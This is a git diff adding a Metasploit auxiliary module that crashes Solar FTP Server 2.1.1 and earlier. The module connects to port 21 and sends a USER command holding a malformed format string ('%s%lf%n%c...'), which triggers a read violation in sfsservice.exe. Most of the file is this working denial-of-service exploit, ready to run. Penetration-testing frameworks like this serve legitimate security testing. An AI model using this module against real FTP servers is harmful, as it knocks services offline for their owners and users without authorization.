diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb new file mode 100644 index 0000000000..899fc1dbc4 --- /dev/null +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -0,0 +1,61 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Solar FTP Server <= 2.1.1 Malformed (User) Denial of Service', + 'Description' => %q{ + This module will send a format string as USER to Solar FTP, causing a READ + violation in function "__output_1()" found in "sfsservice.exe" while trying to + calculate the length of the string. + }, + 'Author' => + [ + 'x000 <3d3n[at]hotmail.com.br>', #Initial disclosure/exploit + 'C4SS!0 G0M3S ', #Metasploit submission + 'sinn3r', #Metasploit edit/commit + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'URL', 'http://www.exploit-db.com/exploits/16204/' ], + ], + 'DisclosureDate' => 'Feb 22 2011')) + + register_options( + [ + Opt::RPORT(21) + ],self.class) + end + + def run + connect + + banner = sock.get_once(-1, 10) + print_status("Banner: #{banner.strip}") + + buf = Rex::Text.pattern_create(50) + buf << "%s%lf%n%c%l%c%n%n%n%nC%lf%u%lf%d%s%v%n" + print_status("Sending format string...") + sock.put("USER #{buf}\r\n") + + disconnect + end + +end \ No newline at end of file